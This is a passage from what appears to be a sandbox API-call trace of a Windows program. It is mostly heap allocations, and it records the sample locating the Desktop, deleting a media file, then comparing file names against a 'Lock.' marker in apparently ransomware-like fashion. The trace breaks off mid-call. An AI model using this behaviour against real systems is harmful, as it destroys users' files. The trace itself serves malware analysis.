HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a779b8 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2abe880 | out: hHeap=0x2af0000) returned 1 [0086.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0086.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0086.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0086.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0086.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0086.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0086.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778c8 | out: hHeap=0x2af0000) returned 1 [0086.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0086.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77580 | out: hHeap=0x2af0000) returned 1 [0086.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0086.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a30 | out: hHeap=0x2af0000) returned 1 [0086.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0086.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a779e0 | out: hHeap=0x2af0000) returned 1 [0086.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0086.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0086.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0086.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a770d0 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76ec8 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75ee8 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0086.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0086.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0086.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0086.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0086.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0086.919] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0086.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0086.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0086.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0086.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0086.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0086.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0086.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0086.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0086.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0086.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0086.919] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0086.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0086.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0086.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0086.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0086.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0086.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0086.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0086.919] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0086.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0086.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6680 [0086.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0086.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0086.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0086.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0086.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0086.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0086.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0086.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0086.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0086.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0086.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0086.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0086.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0086.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0086.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75f60 [0086.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6680 | out: hHeap=0x2af0000) returned 1 [0086.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0086.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0086.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0086.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0086.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0086.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0086.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0086.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0086.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb3c8 [0086.920] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/0LCfOxpKhBY.mkv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\0LCfOxpKhBY.mkv", lpFilePart=0x8cedf4*="0LCfOxpKhBY.mkv") returned 0x27 [0086.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb3c8 | out: hHeap=0x2af0000) returned 1 [0086.920] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\0LCfOxpKhBY.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\0lcfoxpkhby.mkv")) returned 0x20 [0086.920] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\0LCfOxpKhBY.mkv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe913c2c0, ftCreationTime.dwHighDateTime=0x1d5c821, ftLastAccessTime.dwLowDateTime=0x951b3080, ftLastAccessTime.dwHighDateTime=0x1d5cb10, ftLastWriteTime.dwLowDateTime=0x951b3080, ftLastWriteTime.dwHighDateTime=0x1d5cb10, nFileSizeHigh=0x0, nFileSizeLow=0x4b96, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="0LCfOxpKhBY.mkv", cAlternateFileName="0LCFOX~1.MKV")) returned 0x9a3d00 [0086.921] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\0LCfOxpKhBY.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\0lcfoxpkhby.mkv")) returned 1 [0086.965] FindNextFileW (in: hFindFile=0x9a3d00, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe913c2c0, ftCreationTime.dwHighDateTime=0x1d5c821, ftLastAccessTime.dwLowDateTime=0x951b3080, ftLastAccessTime.dwHighDateTime=0x1d5cb10, ftLastWriteTime.dwLowDateTime=0x951b3080, ftLastWriteTime.dwHighDateTime=0x1d5cb10, nFileSizeHigh=0x0, nFileSizeLow=0x4b96, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="0LCfOxpKhBY.mkv", cAlternateFileName="0LCFOX~1.MKV")) returned 0 [0086.965] FindClose (in: hFindFile=0x9a3d00 | out: hFindFile=0x9a3d00) returned 1 [0086.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75f60 | out: hHeap=0x2af0000) returned 1 [0086.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0086.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0086.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0086.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0086.965] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0086.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0086.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0086.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0086.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0086.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0086.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0086.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0086.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0086.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0086.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0086.966] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0086.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0086.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0086.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0086.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0086.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0086.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0086.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0086.966] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0086.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0086.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6290 [0086.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0086.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0086.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0086.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0086.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0086.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0086.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0086.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0086.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0086.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0086.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0086.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0086.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0086.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0086.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75c90 [0086.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6290 | out: hHeap=0x2af0000) returned 1 [0086.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0086.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0086.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0086.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0086.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0086.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0086.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0086.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0086.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0086.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0086.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0086.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0086.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0086.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0086.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0086.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0086.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0086.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0086.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0086.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb210 [0086.968] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/0LCfOxpKhBY.mkv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\0LCfOxpKhBY.mkv", lpFilePart=0x8cf650*="0LCfOxpKhBY.mkv") returned 0x27 [0086.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb210 | out: hHeap=0x2af0000) returned 1 [0086.968] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\0LCfOxpKhBY.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\0lcfoxpkhby.mkv")) returned 0xffffffff [0086.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75c90 | out: hHeap=0x2af0000) returned 1 [0086.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0086.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0086.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0086.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0086.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0086.968] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0086.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0086.968] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0086.968] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0086.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0086.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0086.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0086.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0086.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0086.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0086.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0086.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0086.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0086.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0086.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0086.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0086.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0086.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="63ZOACO2R_kPqlEG.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0086.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3ZOACO2R_kPqlEG.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0086.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZOACO2R_kPqlEG.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0086.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OACO2R_kPqlEG.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0086.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ACO2R_kPqlEG.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0086.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CO2R_kPqlEG.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0086.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O2R_kPqlEG.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0086.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2R_kPqlEG.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0086.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_kPqlEG.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0086.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_kPqlEG.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0086.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kPqlEG.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0086.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 